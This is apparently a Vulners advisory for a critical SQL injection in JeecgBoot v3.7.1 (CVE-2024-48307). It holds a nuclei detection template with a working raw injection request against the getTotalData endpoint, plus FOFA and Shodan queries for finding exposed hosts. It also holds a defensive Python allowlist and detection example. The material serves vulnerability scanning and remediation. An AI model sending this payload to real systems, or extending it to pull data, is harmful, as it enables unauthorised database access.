JeecgBoot v3.7.1 - SQL Injection

09 Dec 2024 19:44:07 | Reported by ProjectDiscovery | Type: nuclei template | Source: github.com

JeecgBoot v3.7.1 has a critical SQL injection vulnerability (CVE-2024-48307, CVSS 3.1 9.8, CWE-89) in the drag/onlDragDatasetHead/getTotalData endpoint. The endpoint takes a JSON body whose config.name[].fieldName values are placed directly into the SQL it builds, so an unauthenticated attacker (CVSS PR:N; the template below sends no session token) can submit SQL expressions as field names and read arbitrary data from the database.

Related

Family                 Title                                   Published
Veracode               SQL Injection                           12 Nov 2024 05:14
CVE                    CVE-2024-48307                          31 Oct 2024 01:15
Vulnrichment           CVE-2024-48307                          31 Oct 2024 00:00
OSV                    JeecgBoot SQL Injection vulnerability   31 Oct 2024 03:30
NVD                    CVE-2024-48307                          31 Oct 2024 01:15
Github Security Blog   JeecgBoot SQL Injection vulnerability   31 Oct 2024 03:30
Cvelist                CVE-2024-48307                          31 Oct 2024 00:00

Code
id: CVE-2024-48307

info:
  name: JeecgBoot v3.7.1 - SQL Injection
  author: lbb,s4e-io
  severity: critical
  description: |
    The JeecgBoot application is vulnerable to SQL Injection via the `getTotalData` endpoint. An attacker can exploit this vulnerability to extract sensitive information from the database by injecting SQL commands.
  remediation: |
    Validate and sanitize user inputs on the server side to prevent SQL injection attacks. Use prepared statements with parameterized queries instead of dynamic queries. Regularly update and patch the application to fix known vulnerabilities.
  reference:
    - https://github.com/wy876/POC/blob/main/JeecgBoot/JeecgBoot%E6%8E%A5%E5%8F%A3getTotalData%E5%AD%98%E5%9C%A8%E6%9C%AA%E6%8E%88%E6%9D%83SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E(CVE-2024-48307).md
    - https://github.com/jeecgboot/JeecgBoot/issues/7237
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-48307
    cwe-id: CWE-89
    epss-score: 0.00045
    epss-percentile: 0.17463
  metadata:
    max-request: 2
    vendor: jeecg
    product: jeecg_boot
    fofa-query:
      - icon_hash="-250963920"
      - icon_hash=1380908726
      - title="jeecg-boot"
    shodan-query: http.favicon.hash:"1380908726"
  tags: cve2024,cve,jeecg,sqli

variables:
  num: "999999999"

http:
  - raw:
      - |
        POST {{path}}drag/onlDragDatasetHead/getTotalData HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"tableName":"sys_user","compName":"test","condition":{"filter":{}},"config":{"assistValue":[],"assistType":[],"name":[{"fieldName":"concat(md5({{num}}),0x3a,0x3a)","fieldType":"string"},{"fieldName":"id","fieldType":"string"}],"value":[{"fieldName":"id","fieldType":"1"}],"type":[]}}

    payloads:
      path:
        - /jeecg-boot/
        - /

    attack: batteringram
    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "YzhjNjA1OTk5ZjNkODM1MmQ3YmI3OTJjZjNmZGIyNWI6Og==")'
          - 'contains(content_type, "application/json")'
          - "status_code == 200"
        condition: and
# digest: 490a0046304402205e6a3d5790483b0bdde032ed47c62a8c417e879b0898511f3099a2cb23166f1402207dcb78d5840d53b890f959a5d11ce8bf25d8515b6113b01fa0bddfb8591531af:922c64590222798bb761d5b6d8e72950
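The template leaves two things implicit: why its matcher is the base64 string "YzhjNjA1OTk5ZjNkODM1MmQ3YmI3OTJjZjNmZGIyNWI6Og==", and what the remediation text ("validate and sanitize user inputs") means for this endpoint. The Python below is an added example, not code from the Vulners page, the nuclei template or the JeecgBoot project. It decodes the matcher constant, rebuilds it for any value of the template's num variable the same way the injected expression concat(md5(num),0x3a,0x3a) would produce it, and applies an identifier allowlist to the request body so that the template's own payload is rejected while a well-formed request passes. The allowlist regex and the benign request body are this example's constructions; JeecgBoot's actual fix is not shown on the page.

```python
"""Added example; not from the Vulners page, the nuclei template or JeecgBoot.

Part 1 rebuilds the template's matcher: the injected fieldName
concat(md5({{num}}),0x3a,0x3a) makes MySQL return md5("<num>") followed by
"::", and the matcher is the base64 form of that value as it appears in the
getTotalData response body.

Part 2 is the hardening/detection side of the remediation text: fieldName
and tableName are SQL identifiers, so accept only identifier characters.
The allowlist regex is this example's choice, not JeecgBoot's actual fix.
"""
import base64
import hashlib
import json
import re

# Matcher constant copied from the nuclei template above.
TEMPLATE_MATCHER = "YzhjNjA1OTk5ZjNkODM1MmQ3YmI3OTJjZjNmZGIyNWI6Og=="

# Request body from the template, with {{num}} already substituted.
TEMPLATE_BODY = json.dumps({
    "tableName": "sys_user",
    "compName": "test",
    "condition": {"filter": {}},
    "config": {
        "assistValue": [], "assistType": [],
        "name": [
            {"fieldName": "concat(md5(999999999),0x3a,0x3a)", "fieldType": "string"},
            {"fieldName": "id", "fieldType": "string"},
        ],
        "value": [{"fieldName": "id", "fieldType": "1"}],
        "type": [],
    },
})

# Constructed benign request of the same shape (not taken from the page).
BENIGN_BODY = json.dumps({
    "tableName": "sys_user",
    "compName": "chart1",
    "condition": {"filter": {}},
    "config": {
        "assistValue": [], "assistType": [],
        "name": [{"fieldName": "username", "fieldType": "string"}],
        "value": [{"fieldName": "id", "fieldType": "1"}],
        "type": [],
    },
})

# Plain SQL identifier: letter or underscore, then up to 63 word characters.
# This is the example's allowlist assumption; tighten it to a per-table
# column list if the schema is known.
IDENTIFIER_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_]{0,63}")


def raw_marker(num: str) -> str:
    """What concat(md5(num),0x3a,0x3a) evaluates to: 32 hex chars + '::'."""
    return hashlib.md5(num.encode("ascii")).hexdigest() + "::"


def build_marker(num: str) -> str:
    """Base64 of raw_marker(num), i.e. the form the template's matcher uses."""
    return base64.b64encode(raw_marker(num).encode("ascii")).decode("ascii")


def decode_marker(marker_b64: str) -> str:
    """Inverse of build_marker(): recover the plaintext the matcher looks for."""
    return base64.b64decode(marker_b64).decode("ascii")


def is_safe_identifier(name) -> bool:
    """Allowlist check for a column or table name supplied by the client."""
    return isinstance(name, str) and IDENTIFIER_RE.fullmatch(name) is not None


def find_unsafe_identifiers(body: str) -> list:
    """Return every client-supplied identifier in a getTotalData body that
    fails the allowlist. An empty list means the request is clean under this
    rule. Usable as a server-side reject check or as a detection over logged
    request bodies for drag/onlDragDatasetHead/getTotalData."""
    data = json.loads(body)
    bad = []
    table = data.get("tableName", "")
    if not is_safe_identifier(table):
        bad.append(table)
    config = data.get("config", {})
    for section in ("name", "value"):
        for item in config.get(section, []):
            field = item.get("fieldName", "") if isinstance(item, dict) else item
            if not is_safe_identifier(field):
                bad.append(field)
    return bad


if __name__ == "__main__":
    print("template matcher decodes to:", decode_marker(TEMPLATE_MATCHER))
    print("rebuilt marker for 999999999 :", build_marker("999999999"))
    print("template body flagged:", find_unsafe_identifiers(TEMPLATE_BODY))
    print("benign body flagged:  ", find_unsafe_identifiers(BENIGN_BODY))
```

Running the block prints the decoded matcher (a 32-character hex digest followed by "::") next to the marker rebuilt from num=999999999; the two should be identical, and a mismatch would mean the matcher constant no longer corresponds to the num variable. The template's own request body is flagged on its concat(...) field name while the constructed benign body passes, which is the behaviour a server-side allowlist (or a WAF/SIEM rule over logged bodies) should have for this endpoint.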

Scores (as of 09 Dec 2024 19:07): Vulners AI Score 7.3 (High risk); CVSS v3 9.8.